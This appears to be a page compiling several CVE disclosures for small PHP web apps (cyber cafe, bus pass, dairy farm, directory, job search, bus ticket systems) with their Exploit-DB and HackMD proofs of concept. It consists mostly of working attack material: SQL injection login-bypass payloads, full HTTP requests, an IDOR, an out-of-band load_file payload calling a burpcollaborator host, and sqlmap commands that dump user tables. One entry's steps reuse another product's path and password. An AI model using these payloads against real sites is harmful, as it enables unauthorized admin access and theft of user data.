Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Cyber Cafe Management System Project v1.0 allows attackers to bypass authentication.

    # Exploit Title: Cyber Cafe Management System  Project (CCMS) 1.0 - SQL Injection Authentication Bypass
    # Date: 29-09-2021
    # Exploit Author: sudoninja
    # Vendor Homepage: https://phpgurukul.com
    # Product link: https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
    # Version: 1.0
    # Tested on: XAMPP / Windows 10
    
    Steps-To-Reproduce:
    Step 1 Go to the Product admin panel http://localhost/ccms/index.php.
    Step 2 – Enter anything in username and password
    Step 3 – Click on Login and capture the request in the burp suite
    Step4 – Change the username to ' OR 1 -- -  and password to ccms
    Step 5 – Click forward and now you will be logged in as admin.
    
    POC 
    
    POST /ccms/ HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 49
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/ccms/
    Cookie: PHPSESSID=agarg3okitkr3g8dbi5icnq8du
    Upgrade-Insecure-Requests: 1
    
    username='%20OR%201%20--%20-&password=ccms&login=

CVE-2022-29009: Offensive Security’s Exploit Database Archive

An insecure direct object reference (IDOR) vulnerability in the viewid parameter of Bus Pass Management System v1.0 allows attackers to access sensitive information.

    # Exploit Title: Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
    # Date: 2021-09-05
    # Exploit Author: sudoninja
    # Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql
    # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
    # Version: 1.0
    # Tested on: Windows 10 - XAMPP Server
    
    # Vulnerable page :
    
    http://localhost/buspassms/admin/view-pass-detail.php?viewid=4
    
    # Vulnerable paramater :
    
    The viewid paramater is Vulnerable to Insecure direct object references (IDOR)
    
    # Proof Of Concept :
    
    # 1 . Download And install [ bus-pass-management-system ]
    # 2 . Go to /admin/index.php and Enter Username & Password 
    # 3 . Navigate to search >> search pass
    # 4 . Click on the view and enter the change viewid into the Url
    
    Use :
    http://localhost/buspassms/admin/view-pass-detail.php?viewid=[change id]

CVE-2022-29008: Offensive Security’s Exploit Database Archive

Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Dairy Farm Shop Management System v1.0 allows attackers to bypass authentication.

    # Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
    # Date: 2021-09-30
    # Exploit Author: sanjay singh
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows 10
    
    Steps-To-Reproduce:
    Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
    Step 2 – Enter anything in username and password
    Step 3 – Click on Login and capture the request in the burp suite
    Step 4 – Change the username to admin' or '1'='1  and password to dfsms
    Step 5 – Click forward and now you will be logged in as admin.
    
    POC
    
    POST /dfsms/index.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 57
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/dfsms/index.php
    Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
    Upgrade-Insecure-Requests: 1
    
    username=admin%27+or+%271%27%3D%271&password=dfsms&login=

CVE-2022-29007: Offensive Security’s Exploit Database Archive

Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Directory Management System v1.0 allows attackers to bypass authentication.

    # Exploit Title: Directory Management System  1.0 - SQL Injection Authentication Bypass
    # Date: 2021-10-01
    # Exploit Author: SUDONINJA
    # Vendor Homepage: https://phpgurukul.com/
    # Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/
    # Version: v1.0
    # Tested on: Windows 10
    
    Steps-To-Reproduce:
    Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
    Step 2 – Enter anything in username and password
    Step 3 – Click on Login and capture the request in the burp suite
    Step 4 – Change the username to admin' or '1'='1  and password to dfsms
    Step 5 – Click forward and now you will be logged in as admin.
    
    POC
    
    POST /dms/admin/ HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 83
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/dms/admin/
    Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
    Upgrade-Insecure-Requests: 1
    
    username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login

CVE-2022-29006: Offensive Security’s Exploit Database Archive

Complete Online Job Search System v1.0 was discovered to contain a SQL injection vulnerability via /eris/index.php?q=result&searchfor=advancesearch.

\--- tags: CVE --- # Complete Online Job Search System Sql Injection \* \`Description\` => sql injection at \`Advance Search\` \* \`Injection Point\` \`\`\`python= SEARCH=972676&COMPANY='%2b(select%20load\_file('%5c%5c%5c%5cjvinr1qkhm4gaenevj08hk95uw0poge457tzgq4f.burpcollaborator.net%5c%5crij'))%2b'&CATEGORY=&submit=Submit \`\`\` # Exploit \* Use \`Burp Suite\` capture request then save as \`job.txt\` \`\`\`python= POST /eris/index.php?q=result&searchfor=advancesearch HTTP/1.1 Host: 192.168.1.101 Origin: http://192.168.1.101 Cookie: PHPSESSID=1dhucklh9bmi4ks7v86dch2k2f Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.101/eris/index.php?q=advancesearch Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 46 SEARCH=972676&COMPANY='%2b(select%20load\_file('%5c%5c%5c%5cjvinr1qkhm4gaenevj08hk95uw0poge457tzgq4f.burpcollaborator.net%5c%5crij'))%2b'&CATEGORY=&submit=Submit \`\`\` \* Use \`Sqlmap\` exploit databases \`\`\`python= python3 sqlmap.py -r job.txt -current-db \`\`\` !\[\](https://i.imgur.com/iKybK4N.png) \`\`\`python= python3 sqlmap.py -r job.txt -D erisdb --tables \`\`\` !\[\](https://i.imgur.com/cmyrHUr.png) \`\`\`python= python3 sqlmap.py -r job.txt -columns -D erisdb -T tblusers -dump \`\`\` !\[\](https://i.imgur.com/GgrDCOM.png) # Vulnerable Code !\[\](https://i.imgur.com/8C9pNAQ.png) No filter input when inserting data to database https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

CVE-2022-29316: Complete Online Job Search System Sql Injection - HackMD

Simple Bus Ticket Booking System v1.0 was discovered to contain multiple SQL injection vulnerbilities via the username and password parameters at /assets/partials/_handleLogin.php.

\--- tags: CVE --- # Simple Bus Ticket Booking System SQL Injection \* \`Description\` => sql injection at login to admin \* \`Injection Point\` \`\`\`python= username=\*&password=000000&submit= \`\`\` # Exploit \* Use \`Burp Suite\` capture request then save as \`bus.txt\` \`\`\`python= POST /SimpleBusTicket-PHP/assets/partials/\_handleLogin.php HTTP/1.1 Host: 192.168.1.101 Content-Length: 34 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.101 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.101/SimpleBusTicket-PHP/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=3aqqbkop81gpl260kvpq42stgo Connection: close username=\*&password=000000&submit= \`\`\` \* Use \`Sqlmap\` exploit databases \`\`\`python= python3 sqlmap.py -r bus.txt --current-db \`\`\` !\[\](https://i.imgur.com/D7u0l5b.png) \`\`\`python= python3 sqlmap.py -r bus.txt -D sbtbsphp --tables \`\`\` !\[\](https://i.imgur.com/jel63Am.png) \`\`\`python= python3 sqlmap.py -r bus.txt -columns -D sbtbsphp -T users -dump \`\`\` !\[\](https://i.imgur.com/8V68ANF.png) # Vulnerable Code !\[\](https://i.imgur.com/cIRhPMW.png) \* No filter \`user\_id\` when inserting data to database https://codeastro.com/simple-bus-ticket-booking-system-in-php-with-source-code/

Tag

#windows